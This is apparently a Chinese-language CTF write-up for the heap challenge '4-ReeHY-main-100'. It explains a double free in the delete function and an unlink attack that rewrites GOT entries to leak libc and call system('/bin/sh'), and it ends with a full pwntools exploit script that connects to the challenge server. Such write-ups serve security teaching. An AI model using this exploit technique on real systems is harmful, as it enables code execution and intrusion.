[pwn]堆:熟练掌握double free+unlink

double free+unlink 4-ReeHY-main-100 writeup

一道经典的堆溢出题目4-ReeHY-main-100

题目分析

江湖规矩,先看安全策略:
[pwn]堆:熟练掌握double free+unlink_第1张图片
还可以,没有full relro说明可以修改got表。然后看看程序的逻辑:
[pwn]堆:熟练掌握double free+unlink_第2张图片
一看到菜单基本就是堆得题目没跑了,然后IDA查看反汇编代码:

create函数(我改名后):
[pwn]堆:熟练掌握double free+unlink_第3张图片
整个create函数充斥着符号溢出的味道…

然后delete函数:
[pwn]堆:熟练掌握double free+unlink_第4张图片
free之前没验证是否存在(程序自己有一个数据结构记录着块是否被释放,就是free下面那行),然后free之后也没有将悬挂指针置空,存在doublefree。

然后是edit函数:
[pwn]堆:熟练掌握double free+unlink_第5张图片
在编辑之前检查了存在位,所以无法进行UAF利用。

最后输出是个废函数:
[pwn]堆:熟练掌握double free+unlink_第6张图片

堆unlink利用

由于程序在free处存在double free,那么可以尝试使用double free接unlink的方式进行任意代码执行。但这里需要找信息泄露,然后计算出system的地址,可以尝试先将free改为puts,然后输出一个地址,然后再讲free改为system。

首先是构造堆的结构:
[pwn]堆:熟练掌握double free+unlink_第7张图片
首先申请相等大小(0x80即可)的cun0-3,然后将cun2和cun3释放,然后再申请一个0x80+0x90=0x110的堆块构造成图中这样,当free3的时候就会触发unlink,将cun2的指针重新定位到cun2-0x18的地方,但由于索引的结构是:
[pwn]堆:熟练掌握double free+unlink_第8张图片
画图表示就是:
[pwn]堆:熟练掌握double free+unlink_第9张图片
所以cun2-0x18的地方就是cun0的flag位,从这个位到下面cun2要跨越一个cun1,当unlink结束之后会变成这样:
[pwn]堆:熟练掌握double free+unlink_第10张图片
红色是改变的,主要看cun2的指针改为了指向cun2-0x18的地方,也就是cun1的flag位,那么想要重新覆盖cun2,我们就会将cun1页覆盖过去,这也是为什么构造堆结构的时候cun0和cun2之间多了一个cun1的原因。我们使用的覆盖payload是:

payload=p64(0)+p64(elf.got['atoi'])+p64(1)+p64(elf.got['free'])+p64(1)+'\n'
edit(2,payload)
edit(2,p64(elf.plt['puts']))

这样修改之后就会变成:
[pwn]堆:熟练掌握double free+unlink_第11张图片
将free的got表修改为puts的got表,这样调用free(cun1)就会变成puts(atoi_addr),成功泄露一个libc中函数的地址,然后计算出system的地址,再讲free_got修改为system地址,然后再调用一下free(cun0)就会变成system(’/bin/sh\x00’)(cun0中存放的/bin/sh字符串)。完整exp设计如下:

from pwn import *

p = remote("111.198.29.45" , 33279)
elf = ELF("./4-ReeHY-main")
libc = ELF('./libc-2.23.so') 

def inputName():
    p.recvuntil('$ ')
    p.sendline('chen')

def create(size,cun,content):
    p.recvuntil('$ ')
    p.sendline('1')
    p.recvuntil('Input size\n')
    p.sendline(str(size))
    p.recvuntil('Input cun\n')
    p.sendline(str(cun))
    p.recvuntil('Input content\n')
    p.sendline(content)

def delete(num):
    p.recvuntil('$ ')
    p.sendline('2')
    p.recvuntil('Chose one to dele\n')
    p.sendline(str(num))

def edit(num,content):
    p.recvuntil('$ ')
    p.sendline('3')
    p.recvuntil('Chose one to edit\n')
    p.sendline(str(num))
    p.recvuntil('Input the content\n')
    p.send(content)

cun1_pointer=0x602100

inputName()
create(0x80,0,'/bin/sh')
create(0x80,1,'a')
create(0x80,2,'a')
create(0x80,3,'a')

delete(3)
delete(2)

payload=p64(0)+p64(0x81)+p64(cun1_pointer-0x18)+p64(cun1_pointer-0x10)+'a'*0x60
payload+=p64(0x80)+p64(0x90)
create(0x110,2,payload)
delete(3)

payload=p64(0)+p64(elf.got['atoi'])+p64(1)+p64(elf.got['free'])+p64(1)+'\n'  #后面的p64(1)是cun2的存在位,不加的话不可以edit
edit(2,payload)
edit(2,p64(elf.plt['puts']))

delete(1)
atoi_addr=u64(p.recvline().strip("\x0a").ljust(8, "\x00"))
system_addr=atoi_addr-libc.symbols['atoi']+libc.symbols['system']

edit(2,p64(system_addr))
delete(0)

p.interactive()

成功getshell:
[pwn]堆:熟练掌握double free+unlink_第12张图片

你可能感兴趣的:(安全,网络安全,二进制安全,pwn,ctf,二进制,ctf,#,ctf-pwn)